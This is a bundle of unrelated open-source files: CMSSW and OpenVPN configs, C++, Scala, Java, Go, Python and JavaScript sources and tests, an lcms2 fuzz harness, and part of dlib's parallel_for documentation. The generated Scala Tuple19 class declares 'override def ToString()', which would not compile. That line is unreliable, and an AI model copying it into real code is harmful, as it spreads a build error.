process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring("/store/data/Run2018D/ZeroBias/RAW/v1/000/320/688/00000/601A721D-AD95-E811-B21A-FA163E28A50A.root"),
#fileNames = cms.untracked.vstring("root://eoscms.cern.ch//eos/cms/store/group/phys_pps/sw_test_input/601A721D-AD95-E811-B21A-FA163E28A50A.root"),
inputCommands = cms.untracked.vstring(
'drop *',
'keep FEDRawDataCollection_*_*_*'
)
)
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(1000)
)
# raw-to-digi conversion
process.load("EventFilter.CTPPSRawToDigi.ctppsRawToDigi_cff")
# local RP reconstruction chain with standard settings
process.load("RecoPPS.Configuration.recoCTPPS_cff")
# define GT
process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")
from Configuration.AlCa.GlobalTag import GlobalTag
process.GlobalTag = GlobalTag(process.GlobalTag, "106X_dataRun2_v26")
# override alignment settings
process.load("CalibPPS.ESProducers.ctppsRPAlignmentCorrectionsDataESSourceXML_cfi")
process.ctppsRPAlignmentCorrectionsDataESSourceXML.RealFiles = cms.vstring(
"RecoPPS/Local/test/re_alignment/align_base.xml"
)
process.esPreferLocalAlignment = cms.ESPrefer("CTPPSRPAlignmentCorrectionsDataESSourceXML", "ctppsRPAlignmentCorrectionsDataESSourceXML")
# track plotter
process.ctppsTrackDistributionPlotter = cms.EDAnalyzer("CTPPSTrackDistributionPlotter",
tagTracks = cms.InputTag("ctppsLocalTrackLiteProducer"),
outputFile = cms.string("output_tracks_base.root")
)
# processing sequences
process.path = cms.Path(
process.ctppsRawToDigi
* process.recoCTPPS
* process.ctppsTrackDistributionPlotter
)
# output configuration
process.output = cms.OutputModule("PoolOutputModule",
fileName = cms.untracked.string("output_base.root"),
outputCommands = cms.untracked.vstring(
"drop *",
'keep CTPPSLocalTrackLites_*_*_*'
)
)
process.outpath = cms.EndPath(process.output)
| {
"pile_set_name": "Github"
} |
#pragma once
#include <ostream>
#include_next <unordered_map>
#include <elle/print-fwd.hh>
namespace std
{
template <typename... Args>
std::ostream&
operator <<(ostream& out,
unordered_map<Args...> const& s)
{
auto const format = is_fixed(out) ? "%s%f: %f" : "%s%s: %s";
out << '{';
auto* sep = "";
for (auto const& e: s)
{
elle::print(out, format, sep, e.first, e.second);
sep = ", ";
}
out << '}';
return out;
}
template <typename... Args>
class keys_iterator
: public std::unordered_map<Args...>::iterator
{
public:
using Super = typename std::unordered_map<Args...>::iterator;
keys_iterator() = default;
keys_iterator(Super s)
: Super(s)
{}
auto
operator*()
{
return Super::operator*().first;
}
};
template <typename... Args>
class const_keys_iterator
: public std::unordered_map<Args...>::const_iterator
{
public:
using Super = typename std::unordered_map<Args...>::const_iterator;
const_keys_iterator() = default;
const_keys_iterator(Super s)
: Super(s)
{}
auto
operator*()
{
return Super::operator*().first;
}
};
template <typename... Args>
const_keys_iterator<Args...>
iter_keys(std::unordered_map<Args...> const& c)
{
return const_keys_iterator<Args...>(c.begin());
}
template <typename... Args>
const_keys_iterator<Args...>
iter_keys_end(std::unordered_map<Args...> const& c)
{
return const_keys_iterator<Args...>(c.end());
}
template <typename... Args>
class values_iterator
: public std::unordered_map<Args...>::iterator
{
public:
using Super = typename std::unordered_map<Args...>::iterator;
values_iterator() = default;
values_iterator(Super s)
: Super(s)
{}
auto&
operator*()
{
return Super::operator*().second;
}
};
template <typename... Args>
values_iterator<Args...>
iter_values(std::unordered_map<Args...>& c)
{
return values_iterator<Args...>(c.begin());
}
template <typename... Args>
class const_values_iterator
: public std::unordered_map<Args...>::const_iterator
{
public:
using Super = typename std::unordered_map<Args...>::const_iterator;
const_values_iterator() = default;
const_values_iterator(Super s)
: Super(s)
{}
auto&
operator*()
{
return Super::operator*().second;
}
};
template <typename... Args>
const_values_iterator<Args...>
iter_values(std::unordered_map<Args...> const& c)
{
return const_values_iterator<Args...>(c.begin());
}
// http://www.open-std.org/JTC1/SC22/wg21/docs/papers/2014/n4161.htm
template <typename... Args, typename Pred>
void erase_if(unordered_map<Args...>& c, Pred pred)
{
for (auto it = begin(c); it != end(c);)
if (pred(*it))
it = c.erase(it);
else
++it;
}
}
// Local Variables:
// mode: c++
// End:
| {
"pile_set_name": "Github"
} |
/* __ *\
** ________ ___ / / ___ Scala API **
** / __/ __// _ | / / / _ | (c) 2002-2011, LAMP/EPFL **
** __\ \/ /__/ __ |/ /__/ __ | http://scala-lang.org/ **
** /____/\___/_/ |_/____/_/ | | **
** |/ **
\* */
// GENERATED CODE: DO NOT EDIT. See scala.Function0 for timestamp.
package scala
/** A tuple of 19 elements; the canonical representation of a [[scala.Product19]].
*
* @constructor Create a new tuple with 19 elements. Note that it is more idiomatic to create a Tuple19 via `(t1, t2, t3, t4, t5, t6, t7, t8, t9, t10, t11, t12, t13, t14, t15, t16, t17, t18, t19)`
* @param _1 Element 1 of this Tuple19
* @param _2 Element 2 of this Tuple19
* @param _3 Element 3 of this Tuple19
* @param _4 Element 4 of this Tuple19
* @param _5 Element 5 of this Tuple19
* @param _6 Element 6 of this Tuple19
* @param _7 Element 7 of this Tuple19
* @param _8 Element 8 of this Tuple19
* @param _9 Element 9 of this Tuple19
* @param _10 Element 10 of this Tuple19
* @param _11 Element 11 of this Tuple19
* @param _12 Element 12 of this Tuple19
* @param _13 Element 13 of this Tuple19
* @param _14 Element 14 of this Tuple19
* @param _15 Element 15 of this Tuple19
* @param _16 Element 16 of this Tuple19
* @param _17 Element 17 of this Tuple19
* @param _18 Element 18 of this Tuple19
* @param _19 Element 19 of this Tuple19
*/
case class Tuple19[+T1, +T2, +T3, +T4, +T5, +T6, +T7, +T8, +T9, +T10, +T11, +T12, +T13, +T14, +T15, +T16, +T17, +T18, +T19](_1: T1, _2: T2, _3: T3, _4: T4, _5: T5, _6: T6, _7: T7, _8: T8, _9: T9, _10: T10, _11: T11, _12: T12, _13: T13, _14: T14, _15: T15, _16: T16, _17: T17, _18: T18, _19: T19)
extends Product19[T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15, T16, T17, T18, T19]
{
override def ToString() = "(" + _1 + "," + _2 + "," + _3 + "," + _4 + "," + _5 + "," + _6 + "," + _7 + "," + _8 + "," + _9 +
"," + _10 + "," + _11 + "," + _12 + "," + _13 + "," + _14 + "," + _15 + "," + _16 + "," + _17 + "," + _18 + "," + _19 + ")"
}
| {
"pile_set_name": "Github"
} |
/**
* Update: 15-5-11
* Editor: qihongye
*/
var fs = require('fs');
var path = require('path');
var fis = require('../lib/fis.js');
var _ = fis.file;
var defaultSettings = (require('../lib/config.js')).DEFALUT_SETTINGS;
var expect = require('chai').expect;
var u = fis.util;
var config = null;
describe('config: config',function(){
beforeEach(function(){
fis.project.setProjectRoot(__dirname);
fis.config.init(defaultSettings);
process.env.NODE_ENV = 'dev';
});
it('set / get', function () {
fis.set('namespace', 'common');
expect(fis.get('namespace')).to.equal('common');
fis.set('obj', {a:'a'});
fis.set('obj.b', 'b');
expect(fis.get('obj')).to.deep.equal({a:'a', b:'b'});
expect(fis.get('obj.c', {c: 'c'})).to.deep.equal({c:'c'});
expect(fis.get('obj.a')).to.equal('a');
expect(fis.get('obj.b')).to.equal('b');
});
it('media', function () {
fis.set('a', 'a');
fis.set('b', 'b');
fis.media('prod').set('a', 'aa');
expect(fis.get('a')).to.equal('a');
expect(fis.media('prod').get('a')).to.equal('aa');
expect(fis.media('prod').get('b')).to.equal('b');
expect(fis.media('prod').get('project.charset')).to.equal('utf8');
});
it('fis.match',function(){
fis.match('**', {
release: 'static/$&'
}); // fis.config.match
fis.match('**/js.js', {
domain: 'www.baidu.com',
useHash: false
}, 1);
path = __dirname+'/file/ext/modular/js.js?__inline';
var f = _.wrap(path);
var url = f.getUrl();
expect(url).to.equal('www.baidu.com/static/file/ext/modular/js.js?__inline');
//without domain
// useDomain 已经去除,所以应该不收其影响了
fis.match('**/js.js', {
useDomain: false
}, 2);
path = __dirname+'/file/ext/modular/js.js?__inline';
var f = _.wrap(path);
var url = f.getUrl();
expect(url).to.equal('www.baidu.com/static/file/ext/modular/js.js?__inline');
fis.match('**/js.js', {
release: null
}, 3);
//without path
path = __dirname+'/file/ext/modular/js.js?__inline';
var f = _.wrap(path);
var url = f.getUrl();
expect(url).to.equal('www.baidu.com/file/ext/modular/js.js?__inline');
// with ()
fis.match('**/v1.0-(*)/(*).html', {
release: '/$1/$2'
});
path = __dirname+'/file/ext/v1.0-layout/test.html?__inline';
var f = _.wrap(path);
var url = f.getUrl();
expect(url).to.equal('/layout/test.html?__inline');
fis.match('!**/js.js', {
release: '/static/$&',
useHash: true,
domain: 'www.baidu.com'
});
//with !
path = __dirname+'/file/ext/modular/js.js?__inline';
var f = _.wrap(path);
var url = f.getUrl();
expect(url).to.equal('www.baidu.com/file/ext/modular/js.js?__inline');
// with ! but not match
path = __dirname+'/file/ext/modular/js.less?__inline';
var f = _.wrap(path);
var url = f.getUrl();
expect(url).to.equal('www.baidu.com/static/file/ext/modular/js_'+ f.getHash() +'.less?__inline');
});
it('match ${}', function() {
fis.match('**/*.js', {
release: null,
useHash: false
})
fis.set('coffee', 'js');
fis.match('**/js.js', {
release: '/static/$&'
});
path = __dirname+'/file/ext/modular/js.js?__inline';
var f = _.wrap(path);
var url = f.getUrl();
expect(url).to.equal('/static/file/ext/modular/js.js?__inline');
path = __dirname+'/file/ext/modular/j.js?__inline';
var f = _.wrap(path);
var url = f.getUrl();
expect(url).to.equal('/file/ext/modular/j.js?__inline');
});
it('match 混合用法', function() {
fis.set('ROOT', 'js');
fis.match('**', {
useHash: false
});
fis.match('(**/${ROOT}.js)', {
release: '/static/js/$1'
});
fis.match('(**/${ROOT}.less)', {
release: '/static/js/$1'
});
path = __dirname+'/file/ext/modular/js.js?__inline';
var f = _.wrap(path);
var url = f.getUrl();
expect(url).to.equal('/static/js/file/ext/modular/js.js?__inline');
path = __dirname+'/file/ext/modular/js.less?__inline';
var f = _.wrap(path);
var url = f.getUrl();
expect(url).to.equal('/static/js/file/ext/modular/js.less?__inline');
});
it('del', function(){
fis.config.del();
var origin = fis.config.get();
fis.set('a.b', 'b');
fis.media('pro').set('a.b', 'b');
fis.config.del('a.b');
expect(fis.get('a')).to.deep.equal({});
expect(fis.media('pro').get('a.b')).to.equal('b');
fis.config.del('a');
expect(fis.get()).to.deep.equal(origin);
fis.media('pro').del('a');
expect(fis.media('pro').get()).to.deep.equal({});
});
it('getSortedMatches', function() {
fis.media('prod').match('a', {
name: ''
});
var matches = fis.media('prod')._matches.concat();
var initIndex = matches[matches.length - 1].index;
fis.match('b', {
name: ''
}, 1)
fis.match('c', {
name: ''
}, 2)
fis.media('prod').match('b', {
name: 'prod'
}, 1)
fis.media('prod').match('c', {
name: 'prod'
}, 2);
var result_gl = [
{
raw: 'b',
reg: u.glob('b'),
negate: false,
properties: {name: ''},
media: 'GLOBAL',
weight: 1,
index: initIndex + 1
},
{
raw: 'c',
reg: u.glob('c'),
negate: false,
properties: {name: ''},
media: 'GLOBAL',
weight: 2,
index: initIndex + 2
}
], result_prod = [
{
raw: 'a',
reg: u.glob('a'),
negate: false,
properties: {name: ''},
media: 'prod',
weight: 0,
index: initIndex + 0
},
{
raw: 'b',
reg: u.glob('b'),
negate: false,
properties: {name: ''},
media: 'GLOBAL',
weight: 1,
index: initIndex + 1
},
{
raw: 'b',
reg: u.glob('b'),
negate: false,
properties: {name: 'prod'},
media: 'prod',
weight: 1,
index: initIndex + 3
},
{
raw: 'c',
reg: u.glob('c'),
negate: false,
properties: {name: ''},
media: 'GLOBAL',
weight: 2,
index: initIndex + 2
},
{
raw: 'c',
reg: u.glob('c'),
negate: false,
properties: {name: 'prod'},
media: 'prod',
weight: 2,
index: initIndex + 4
},
];
var xp = fis.config.getSortedMatches();
expect(xp).to.deep.equal(result_gl);
var xp2 = fis.media('prod').getSortedMatches();
expect(xp2).to.deep.equal(result_prod);
});
it("hook",function(){
fis.config.hook("module");
expect(fis.env().parent.data.modules.hook[1]['__plugin']).to.equal('module');
});
it("unhook",function(){
fis.config.unhook("module");
expect(fis.env().parent.data.modules.hook.length).to.equal(1);
});
});
| {
"pile_set_name": "Github"
} |
/**
* ValueIterator.cpp
*
* Implementation of the value iterator
*
* @author Emiel Bruijntjes <emiel.bruijntjes@copernica.com>
* @copyright 2014 Copernica BV
*/
#include "includes.h"
/**
* Set up namespace
*/
namespace Php {
/**
* Constructor
* @param impl Implementation iterator
*/
ValueIterator::ValueIterator(ValueIteratorImpl *impl) : _impl(impl) {}
/**
* Copy constructor
* @param that
*/
ValueIterator::ValueIterator(const ValueIterator &that) : _impl(that._impl->clone()) {}
/**
* Destructor
*/
ValueIterator::~ValueIterator() = default;
/**
* Increment position
* @return ValueIterator
*/
ValueIterator &ValueIterator::operator++()
{
// increment implementation
_impl->increment();
// done
return *this;
}
/**
* Decrement position
* @return ValueIterator
*/
ValueIterator &ValueIterator::operator--()
{
// decrement implementation
_impl->decrement();
// done
return *this;
}
/**
* Compare with other iterator
* @param that
* @return bool
*/
bool ValueIterator::operator==(const ValueIterator &that) const
{
return _impl->equals(that._impl.get());
}
/**
* Compare with other iterator
* @param that
* @return bool
*/
bool ValueIterator::operator!=(const ValueIterator &that) const
{
return !_impl->equals(that._impl.get());
}
/**
* Derefecence, this returns a std::pair with the current key and value
* @return std::pair
*/
const std::pair<Value,Value> &ValueIterator::operator*() const
{
return _impl->current();
}
/**
* Dereference, this returns a std::pair with the current key and value
* @return std::pair
*/
const std::pair<Value,Value> *ValueIterator::operator->() const
{
return &_impl->current();
}
/**
* End namespace
*/
}
| {
"pile_set_name": "Github"
} |
/*
* reserved comment block
* DO NOT REMOVE OR ALTER!
*/
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.sun.org.apache.bcel.internal.classfile;
import java.io.DataInput;
import java.io.DataOutputStream;
import java.io.IOException;
import com.sun.org.apache.bcel.internal.Const;
/**
* This class is derived from the abstract {@link Constant}
* and represents a reference to a String object.
*
* @version $Id$
* @see Constant
*/
public final class ConstantString extends Constant implements ConstantObject {
private int string_index; // Identical to ConstantClass except for this name
/**
* Initialize from another object.
*/
public ConstantString(final ConstantString c) {
this(c.getStringIndex());
}
/**
* Initialize instance from file data.
*
* @param file Input stream
* @throws IOException
*/
ConstantString(final DataInput file) throws IOException {
this(file.readUnsignedShort());
}
/**
* @param string_index Index of Constant_Utf8 in constant pool
*/
public ConstantString(final int string_index) {
super(Const.CONSTANT_String);
this.string_index = string_index;
}
/**
* Called by objects that are traversing the nodes of the tree implicitely
* defined by the contents of a Java class. I.e., the hierarchy of methods,
* fields, attributes, etc. spawns a tree of objects.
*
* @param v Visitor object
*/
@Override
public void accept( final Visitor v ) {
v.visitConstantString(this);
}
/**
* Dump constant field reference to file stream in binary format.
*
* @param file Output file stream
* @throws IOException
*/
@Override
public final void dump( final DataOutputStream file ) throws IOException {
file.writeByte(super.getTag());
file.writeShort(string_index);
}
/**
* @return Index in constant pool of the string (ConstantUtf8).
*/
public final int getStringIndex() {
return string_index;
}
/**
* @param string_index the index into the constant of the string value
*/
public final void setStringIndex( final int string_index ) {
this.string_index = string_index;
}
/**
* @return String representation.
*/
@Override
public final String toString() {
return super.toString() + "(string_index = " + string_index + ")";
}
/** @return String object
*/
@Override
public Object getConstantValue( final ConstantPool cp ) {
final Constant c = cp.getConstant(string_index, Const.CONSTANT_Utf8);
return ((ConstantUtf8) c).getBytes();
}
/** @return dereferenced string
*/
public String getBytes( final ConstantPool cp ) {
return (String) getConstantValue(cp);
}
}
| {
"pile_set_name": "Github"
} |
client
dev tun
proto tcp
remote sg.mullvad.net 80
cipher AES-256-CBC
resolv-retry infinite
nobind
persist-key
persist-tun
verb 3
remote-cert-tls server
ping 10
ping-restart 60
sndbuf 524288
rcvbuf 524288
auth-user-pass /config/openvpn-credentials.txt
ca /etc/openvpn/mullvad/ca.crt
tun-ipv6
script-security 2
tls-cipher TLS-DHE-RSA-WITH-AES-256-GCM-SHA384:TLS-DHE-RSA-WITH-AES-256-CBC-SHA
| {
"pile_set_name": "Github"
} |
// Copyright 2016 Google Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
////////////////////////////////////////////////////////////////////////////////
#include <stdint.h>
#include "lcms2.h"
// The main sink
int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {
if (size == 0)
return 0;
cmsHANDLE handle = cmsIT8LoadFromMem(0, (void *)data, size);
if (handle)
cmsIT8Free(handle);
return 0;
}
| {
"pile_set_name": "Github"
} |
"""
Components for "My playlists" page.
"""
import urwid
from clay.gp import gp
from clay.songlist import SongListBox
from clay.notifications import notification_area
from clay.pages.page import AbstractPage
from clay.hotkeys import hotkey_manager
class MyPlaylistListItem(urwid.Columns):
"""
One playlist in the list of playlists.
"""
signals = ['activate']
def __init__(self, playlist):
self.playlist = playlist
self.text = urwid.SelectableIcon(u' \u2630 {} ({})'.format(
self.playlist.name,
len(self.playlist.tracks)
), cursor_position=3)
self.text.set_layout('left', 'clip', None)
self.content = urwid.AttrWrap(
self.text,
'default',
'selected'
)
super(MyPlaylistListItem, self).__init__([self.content])
def keypress(self, size, key):
"""
Handle keypress.
"""
return hotkey_manager.keypress("playlist_page", self, super(MyPlaylistListItem, self),
size, key)
def start_playlist(self):
"""
Start playing the selected playlist
"""
urwid.emit_signal(self, 'activate', self)
def get_tracks(self):
"""
Returns a list of :class:`clay.gp.Track` instances.
"""
return self.playlist.tracks
class MyPlaylistListBox(urwid.ListBox):
"""
List of playlists.
"""
signals = ['activate']
def __init__(self, app):
self.app = app
self.walker = urwid.SimpleListWalker([
urwid.Text('Not ready')
])
self.notification = None
gp.auth_state_changed += self.auth_state_changed
super(MyPlaylistListBox, self).__init__(self.walker)
def auth_state_changed(self, is_auth):
"""
Called when auth state changes (e. g. user is logged in).
Requests fetching of playlists.
"""
if is_auth:
self.walker[:] = [
urwid.Text(u'\n \uf01e Loading playlists...', align='center')
]
gp.get_all_user_playlist_contents_async(callback=self.on_get_playlists)
def on_get_playlists(self, playlists, error):
"""
Called when a list of playlists fetch completes.
Populates list of playlists.
"""
if error:
notification_area.notify('Failed to get playlists: {}'.format(str(error)))
items = []
for playlist in playlists:
myplaylistlistitem = MyPlaylistListItem(playlist)
urwid.connect_signal(
myplaylistlistitem, 'activate', self.item_activated
)
items.append(myplaylistlistitem)
self.walker[:] = items
self.app.redraw()
def item_activated(self, myplaylistlistitem):
"""
Called when a specific playlist is selected.
Re-emits this event.
"""
urwid.emit_signal(self, 'activate', myplaylistlistitem)
class MyPlaylistsPage(urwid.Columns, AbstractPage):
"""
Playlists page.
Contains two parts:
- List of playlists (:class:`.MyPlaylistListBox`)
- List of songs in selected playlist (:class:`clay:songlist:SongListBox`)
"""
@property
def name(self):
return 'Playlists'
@property
def key(self):
return 2
@property
def slug(self):
"""
Return page ID (str).
"""
return "playlists"
def __init__(self, app):
self.app = app
self.myplaylistlist = MyPlaylistListBox(app)
self.songlist = SongListBox(app)
self.songlist.set_placeholder('\n Select a playlist.')
urwid.connect_signal(
self.myplaylistlist, 'activate', self.myplaylistlistitem_activated
)
super(MyPlaylistsPage, self).__init__([
self.myplaylistlist,
self.songlist
])
def myplaylistlistitem_activated(self, myplaylistlistitem):
"""
Called when specific playlist is selected.
Populates songlist with tracks from the selected playlist.
"""
self.songlist.populate(
myplaylistlistitem.get_tracks()
)
def activate(self):
pass
| {
"pile_set_name": "Github"
} |
// Copyright 2015 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package tea
import (
"bytes"
"testing"
)
// A sample test key for when we just want to initialize a cipher
var testKey = []byte{0x00, 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88, 0x99, 0xAA, 0xBB, 0xCC, 0xDD, 0xEE, 0xFF}
// Test that the block size for tea is correct
func TestBlocksize(t *testing.T) {
c, err := NewCipher(testKey)
if err != nil {
t.Fatalf("NewCipher returned error: %s", err)
}
if result := c.BlockSize(); result != BlockSize {
t.Errorf("cipher.BlockSize returned %d, but expected %d", result, BlockSize)
}
}
// Test that invalid key sizes return an error
func TestInvalidKeySize(t *testing.T) {
var key [KeySize + 1]byte
if _, err := NewCipher(key[:]); err == nil {
t.Errorf("invalid key size %d didn't result in an error.", len(key))
}
if _, err := NewCipher(key[:KeySize-1]); err == nil {
t.Errorf("invalid key size %d didn't result in an error.", KeySize-1)
}
}
// Test Vectors
type teaTest struct {
rounds int
key []byte
plaintext []byte
ciphertext []byte
}
var teaTests = []teaTest{
// These were sourced from https://github.com/froydnj/ironclad/blob/master/testing/test-vectors/tea.testvec
{
numRounds,
[]byte{0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
[]byte{0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
[]byte{0x41, 0xea, 0x3a, 0x0a, 0x94, 0xba, 0xa9, 0x40},
},
{
numRounds,
[]byte{0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff},
[]byte{0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff},
[]byte{0x31, 0x9b, 0xbe, 0xfb, 0x01, 0x6a, 0xbd, 0xb2},
},
{
16,
[]byte{0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
[]byte{0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
[]byte{0xed, 0x28, 0x5d, 0xa1, 0x45, 0x5b, 0x33, 0xc1},
},
}
// Test encryption
func TestCipherEncrypt(t *testing.T) {
// Test encryption with standard 64 rounds
for i, test := range teaTests {
c, err := NewCipherWithRounds(test.key, test.rounds)
if err != nil {
t.Fatalf("#%d: NewCipher returned error: %s", i, err)
}
var ciphertext [BlockSize]byte
c.Encrypt(ciphertext[:], test.plaintext)
if !bytes.Equal(ciphertext[:], test.ciphertext) {
t.Errorf("#%d: incorrect ciphertext. Got %x, wanted %x", i, ciphertext, test.ciphertext)
}
var plaintext2 [BlockSize]byte
c.Decrypt(plaintext2[:], ciphertext[:])
if !bytes.Equal(plaintext2[:], test.plaintext) {
t.Errorf("#%d: incorrect plaintext. Got %x, wanted %x", i, plaintext2, test.plaintext)
}
}
}
| {
"pile_set_name": "Github"
} |
// Copyright (C) 2013 Davis E. King (davis@dlib.net)
// License: Boost Software License See LICENSE.txt for the full license.
#undef DLIB_PARALLEL_FoR_ABSTRACT_Hh_
#ifdef DLIB_PARALLEL_FoR_ABSTRACT_Hh_
#include "thread_pool_extension_abstract.h"
#include "async_abstract.h"
namespace dlib
{
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for_blocked (
thread_pool& tp,
long begin,
long end,
T& obj,
void (T::*funct)(long, long),
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This is a convenience function for submitting a block of jobs to a thread_pool.
In particular, given the half open range [begin, end), this function will
split the range into approximately tp.num_threads_in_pool()*chunks_per_thread
blocks, which it will then submit to the thread_pool. The given thread_pool
will then call (obj.*funct)() on each of the subranges.
- To be precise, suppose we have broken the range [begin, end) into the
following subranges:
- [begin[0], end[0])
- [begin[1], end[1])
- [begin[2], end[2])
...
- [begin[n], end[n])
Then parallel_for_blocked() submits each of these subranges to tp for
processing such that (obj.*funct)(begin[i], end[i]) is invoked for all valid
values of i. Moreover, the subranges are non-overlapping and completely
cover the total range of [begin, end).
- This function will not perform any memory allocations or create any system
resources such as mutex objects.
!*/
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for_blocked (
unsigned long num_threads,
long begin,
long end,
T& obj,
void (T::*funct)(long, long),
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is equivalent to the following block of code:
thread_pool tp(num_threads);
parallel_for_blocked(tp, begin, end, obj, funct, chunks_per_thread);
!*/
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for_blocked (
thread_pool& tp,
long begin,
long end,
const T& funct,
long chunks_per_thread = 8
);
/*!
requires
- chunks_per_thread > 0
- begin <= end
ensures
- This is a convenience function for submitting a block of jobs to a
thread_pool. In particular, given the range [begin, end), this function will
split the range into approximately tp.num_threads_in_pool()*chunks_per_thread
blocks, which it will then submit to the thread_pool. The given thread_pool
will then call funct() on each of the subranges.
- To be precise, suppose we have broken the range [begin, end) into the
following subranges:
- [begin[0], end[0])
- [begin[1], end[1])
- [begin[2], end[2])
...
- [begin[n], end[n])
Then parallel_for_blocked() submits each of these subranges to tp for
processing such that funct(begin[i], end[i]) is invoked for all valid values
of i.
- This function will not perform any memory allocations or create any system
resources such as mutex objects.
!*/
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for_blocked (
unsigned long num_threads,
long begin,
long end,
const T& funct,
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is equivalent to the following block of code:
thread_pool tp(num_threads);
parallel_for_blocked(tp, begin, end, funct, chunks_per_thread);
!*/
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for_blocked (
long begin,
long end,
const T& funct,
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is equivalent to the following block of code:
parallel_for_blocked(default_thread_pool(), begin, end, funct, chunks_per_thread);
!*/
// ----------------------------------------------------------------------------------------
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for (
thread_pool& tp,
long begin,
long end,
T& obj,
void (T::*funct)(long),
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is equivalent to the following function call:
parallel_for_blocked(tp, begin, end, [&](long begin_sub, long end_sub)
{
for (long i = begin_sub; i < end_sub; ++i)
(obj.*funct)(i);
}, chunks_per_thread);
- Therefore, this routine invokes (obj.*funct)(i) for all i in the range
[begin, end). However, it does so using tp.num_threads_in_pool() parallel
threads.
- This function will not perform any memory allocations or create any system
resources such as mutex objects.
!*/
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for (
unsigned long num_threads,
long begin,
long end,
T& obj,
void (T::*funct)(long),
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is equivalent to the following block of code:
thread_pool tp(num_threads);
parallel_for(tp, begin, end, obj, funct, chunks_per_thread);
!*/
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for (
thread_pool& tp,
long begin,
long end,
const T& funct,
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is equivalent to the following function call:
parallel_for_blocked(tp, begin, end, [&](long begin_sub, long end_sub)
{
for (long i = begin_sub; i < end_sub; ++i)
funct(i);
}, chunks_per_thread);
- Therefore, this routine invokes funct(i) for all i in the range [begin, end).
However, it does so using tp.num_threads_in_pool() parallel threads.
- This function will not perform any memory allocations or create any system
resources such as mutex objects.
!*/
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for (
unsigned long num_threads,
long begin,
long end,
const T& funct,
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is equivalent to the following block of code:
thread_pool tp(num_threads);
parallel_for(tp, begin, end, funct, chunks_per_thread);
!*/
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for (
long begin,
long end,
const T& funct,
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is equivalent to the following block of code:
parallel_for(default_thread_pool(), begin, end, funct, chunks_per_thread);
!*/
// ----------------------------------------------------------------------------------------
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for_verbose (
thread_pool& tp,
long begin,
long end,
T& obj,
void (T::*funct)(long),
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is identical to the parallel_for() routine defined above except
that it will print messages to cout showing the progress in executing the
parallel for loop.
!*/
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for_verbose (
unsigned long num_threads,
long begin,
long end,
T& obj,
void (T::*funct)(long),
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is identical to the parallel_for() routine defined above except
that it will print messages to cout showing the progress in executing the
parallel for loop.
!*/
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for_verbose (
thread_pool& tp,
long begin,
long end,
const T& funct,
long chunks_per_thread = 8
);
/*!
requires
- begin <= end
- chunks_per_thread > 0
ensures
- This function is identical to the parallel_for() routine defined above except
that it will print messages to cout showing the progress in executing the
parallel for loop.
!*/
// ----------------------------------------------------------------------------------------
template <typename T>
void parallel_for_verbose (
unsigned long num_threads,
long begin,
long end,
const T& funct,
